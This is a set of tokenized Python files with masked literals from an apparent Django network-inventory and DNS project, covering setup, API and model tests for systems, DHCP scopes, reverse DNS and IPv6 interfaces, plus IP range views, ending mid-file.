<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> '<STR_LIT:A>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> import sys <EOL> from distutils . core import setup <EOL> version = '<STR_LIT>' <EOL> kwargs = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : """<STR_LIT>""" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( version , version ) , <EOL> '<STR_LIT>' : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> } <EOL> if sys . hexversion >= <NUM_LIT> : <EOL> kwargs [ '<STR_LIT>' ] = [ ] <EOL> kwargs [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> setup ( ** kwargs ) </s>
<s> from django . test import TestCase <EOL> from django . test . client import Client <EOL> try : <EOL> import json <EOL> except : <EOL> from django . utils import simplejson as json <EOL> from MacroExpansion import MacroExpansion <EOL> from KeyValueTree import KeyValueTree <EOL> from truth . models import Truth , KeyValue as TruthKeyValue <EOL> class TestMacroExpansion ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_import ( self ) : <EOL> try : <EOL> from MacroExpansion import MacroExpansion <EOL> except : <EOL> raise ( BaseException ( '<STR_LIT>' ) ) <EOL> try : <EOL> from KeyValueTree import KeyValueTree <EOL> except : <EOL> raise ( BaseException ( '<STR_LIT>' ) ) <EOL> def test_key_value_not_found ( self ) : <EOL> m = MacroExpansion ( '<STR_LIT>' ) <EOL> self . assertEqual ( m . output ( ) , '<STR_LIT>' ) <EOL> def test_key_value_found ( self ) : <EOL> m = MacroExpansion ( '<STR_LIT>' ) <EOL> self . assertEqual ( m . output ( ) , '<STR_LIT>' ) <EOL> class SystemApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> new_hostname = '<STR_LIT>' <EOL> new_host_id = <NUM_LIT:3> <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_system_not_found_by_id ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_get_system_by_id ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> def test_get_system_by_hostname ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> def test_create_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . 
new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . get ( '<STR_LIT>' % obj [ '<STR_LIT:id>' ] , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % self . new_hostname , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , self . new_hostname ) <EOL> def test_update_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . put ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , follow = True ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_delete_system ( self ) : <EOL> self . client . delete ( '<STR_LIT>' % self . new_hostname ) <EOL> resp = self . client . post ( '<STR_LIT>' % self . new_hostname ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . delete ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> obj = json . loads ( resp . content . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] ) <EOL> resp = self . client . get ( '<STR_LIT>' % ( obj [ '<STR_LIT:id>' ] ) , follow = True ) <EOL> self . 
assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> resp = self . client . get ( '<STR_LIT>' % self . new_hostname , follow = True ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_key_value_tree ( self ) : <EOL> tree = KeyValueTree ( '<STR_LIT>' ) . final <EOL> self . assertEqual ( tree [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_key_value_api ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:1>' } ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_asset_tag ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_serial ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . 
content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_serial_and_asset_tag_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_rack_and_rack_order ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_rack_and_rack_order_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack_and_serial ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_switch_ports ( self ) : <EOL> resp = self . client . 
get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . content ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_search_by_system_switch_ports_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_search_by_system_rack_and_serial_not_found ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> class DHCPApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_single_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT:True>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_get_second_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> """<STR_LIT>""" <EOL> def test_get_multiple_scopes ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> scope_list = json . loads ( resp . content ) <EOL> """<STR_LIT>""" <EOL> def test_get_system_by_scope ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> system_list = json . loads ( resp . content ) <EOL> self . 
assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_get_adapters_by_system ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> system_list = json . loads ( resp . content ) <EOL> def test_delete_network_adapter ( self ) : <EOL> resp = self . client . delete ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> class TestReverseDNSApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_single_reverse_zone_names_with_descriptions ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> scope_list = json . loads ( resp . content ) <EOL> self . assertEqual ( len ( scope_list ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:1> ] [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( scope_list [ <NUM_LIT:1> ] [ '<STR_LIT:description>' ] , '<STR_LIT>' ) <EOL> def test_get_system_by_reverse_dns_zone ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> system_list = json . loads ( resp . content ) <EOL> self . assertEqual ( len ( system_list ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . 
assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( system_list [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class KeyValueApi ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setup ( self ) : <EOL> self . client = Client ( ) <EOL> def test_get_adapters_by_system ( self ) : <EOL> resp = self . client . get ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , follow = True ) <EOL> def test_keyvalue_set_invalid_ip ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_keyvalue_set_valid_ip ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> def test_keyvalue_set_invalid_mac_address ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> def test_keyvalue_set_valid_mac_address ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> def test_keyvalue_set_invalid_is_dhcp_scope ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT:true>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . 
status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_start ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_end ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_pool_start ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_pool_end ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_scope_netmask ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" <EOL> def test_keyvalue_set_invalid_dhcp_ntp_server ( self ) : <EOL> resp = self . client . put ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:2>' , '<STR_LIT:value>' : '<STR_LIT>' , '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT> ) <EOL> """<STR_LIT>""" </s>
<s> from django . test import TestCase <EOL> from django . core . exceptions import ValidationError <EOL> from core . interface . static_intr . models import StaticInterface <EOL> from systems . models import System <EOL> from mozdns . domain . models import Domain <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . ip . utils import ip_to_domain_name <EOL> class V6StaticInterTests ( TestCase ) : <EOL> def create_domain ( self , name , ip_type = None , delegated = False ) : <EOL> if ip_type is None : <EOL> ip_type = '<STR_LIT:4>' <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> name = ip_to_domain_name ( name , ip_type = ip_type ) <EOL> d = Domain ( name = name , delegated = delegated ) <EOL> d . clean ( ) <EOL> self . assertTrue ( d . is_reverse ) <EOL> return d <EOL> def setUp ( self ) : <EOL> self . arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . arpa . save ( ) <EOL> self . i_arpa = self . create_domain ( name = '<STR_LIT>' , ip_type = '<STR_LIT>' ) <EOL> self . i_arpa . save ( ) <EOL> self . c = Domain ( name = "<STR_LIT>" ) <EOL> self . c . save ( ) <EOL> self . f_c = Domain ( name = "<STR_LIT>" ) <EOL> self . f_c . save ( ) <EOL> self . r1 = self . create_domain ( name = "<STR_LIT:0>" , ip_type = '<STR_LIT>' ) <EOL> self . r1 . save ( ) <EOL> self . r2 = self . create_domain ( name = "<STR_LIT:1>" , ip_type = '<STR_LIT>' ) <EOL> self . r2 . save ( ) <EOL> self . n = System ( ) <EOL> self . n . clean ( ) <EOL> self . n . save ( ) <EOL> def do_add ( self , mac , label , domain , ip_str , ip_type = '<STR_LIT>' ) : <EOL> r = StaticInterface ( mac = mac , label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type , system = self . n ) <EOL> r . clean ( ) <EOL> r . save ( ) <EOL> repr ( r ) <EOL> return r <EOL> def do_delete ( self , r ) : <EOL> ip_str = r . ip_str <EOL> fqdn = r . fqdn <EOL> r . 
delete ( ) <EOL> self . assertFalse ( <EOL> AddressRecord . objects . filter ( ip_str = ip_str , fqdn = fqdn ) ) <EOL> def test1_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT:foo>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test2_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test3_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test4_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> def test1_delete ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> r = self . do_add ( ** kwargs ) <EOL> self . do_delete ( r ) <EOL> def test1_dup_create_basic ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> self . do_add ( ** kwargs ) <EOL> self . 
assertRaises ( ValidationError , self . do_add , ** kwargs ) <EOL> def test1_bad_add_for_a_ptr ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> ip_type = '<STR_LIT>' <EOL> i = self . do_add ( ** kwargs ) <EOL> i . clean ( ) <EOL> i . save ( ) <EOL> a = AddressRecord ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type ) <EOL> self . assertRaises ( ValidationError , a . clean ) <EOL> ptr = PTR ( ip_str = ip_str , ip_type = ip_type , name = i . fqdn ) <EOL> self . assertRaises ( ValidationError , ptr . clean ) <EOL> def test2_bad_add_for_a_ptr ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> ip_type = '<STR_LIT>' <EOL> a = AddressRecord ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type ) <EOL> a . clean ( ) <EOL> a . save ( ) <EOL> ptr = PTR ( ip_str = ip_str , ip_type = ip_type , name = a . fqdn ) <EOL> ptr . clean ( ) <EOL> ptr . save ( ) <EOL> self . assertRaises ( ValidationError , self . do_add , ** kwargs ) <EOL> def test1_bad_reverse_domain ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> kwargs = { '<STR_LIT>' : mac , '<STR_LIT:label>' : label , '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : ip_str } <EOL> i = self . do_add ( ** kwargs ) <EOL> i . ip_str = "<STR_LIT>" <EOL> self . assertRaises ( ValidationError , i . clean ) <EOL> def test1_no_system ( self ) : <EOL> mac = "<STR_LIT>" <EOL> label = "<STR_LIT>" <EOL> domain = self . 
f_c <EOL> ip_str = "<STR_LIT>" + mac <EOL> ip_type = '<STR_LIT>' <EOL> r = StaticInterface ( label = label , domain = domain , ip_str = ip_str , <EOL> ip_type = ip_type , system = None ) <EOL> self . assertRaises ( ValidationError , r . clean ) </s>
<s> from django . core . exceptions import ObjectDoesNotExist , ValidationError <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . shortcuts import render <EOL> from django . http import HttpResponse <EOL> from core . utils import int_to_ip , resolve_ip_type <EOL> from core . range . forms import RangeForm <EOL> from core . range . utils import range_usage <EOL> from core . range . models import Range <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from core . views import CoreDeleteView , CoreDetailView <EOL> from core . views import CoreCreateView , CoreUpdateView , CoreListView <EOL> import ipaddr <EOL> import simplejson as json <EOL> class RangeView ( object ) : <EOL> model = Range <EOL> form_class = RangeForm <EOL> queryset = Range . objects . all ( ) <EOL> class RangeDeleteView ( RangeView , CoreDeleteView ) : <EOL> pass <EOL> class RangeCreateView ( RangeView , CoreCreateView ) : <EOL> pass <EOL> class RangeUpdateView ( RangeView , CoreUpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeListView ( RangeView , CoreListView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeDetailView ( RangeView , CoreDetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RangeDetailView , self ) . get_context_data ( <EOL> ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> def range_usage_text ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> format = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not ( start and end ) : <EOL> return HttpResponse ( json . 
dumps ( { <EOL> '<STR_LIT:success>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> get_objects = request . GET . get ( '<STR_LIT>' , False ) <EOL> if start . find ( '<STR_LIT::>' ) > - <NUM_LIT:1> : <EOL> ip_type = '<STR_LIT>' <EOL> else : <EOL> ip_type = '<STR_LIT:4>' <EOL> try : <EOL> usage_data = range_usage ( start , end , ip_type , get_objects ) <EOL> except ( ValidationError , ipaddr . AddressValueError ) , e : <EOL> return HttpResponse ( <EOL> json . dumps ( { <EOL> '<STR_LIT>' : str ( e ) , <EOL> '<STR_LIT:success>' : False <EOL> } ) ) <EOL> if format == '<STR_LIT>' : <EOL> usage_data [ '<STR_LIT>' ] = map ( lambda x : ( int_to_ip ( x [ <NUM_LIT:0> ] , ip_type ) , <EOL> int_to_ip ( x [ <NUM_LIT:1> ] , ip_type ) ) , <EOL> usage_data [ '<STR_LIT>' ] ) <EOL> usage_data [ '<STR_LIT:success>' ] = True <EOL> return HttpResponse ( json . dumps ( usage_data ) ) <EOL> def range_usage_ajax ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> start_ip_type , _ = resolve_ip_type ( start ) <EOL> end_ip_type , _ = resolve_ip_type ( end ) <EOL> errors = None <EOL> if start_ip_type != end_ip_type or start_ip_type is None : <EOL> errors = "<STR_LIT>" <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> } ) <EOL> rusage = range_usage ( start , end , start_ip_type , get_objects = True ) <EOL> def translate_ip ( ip_i , * args ) : <EOL> return int_to_ip ( ip_i , start_ip_type ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> 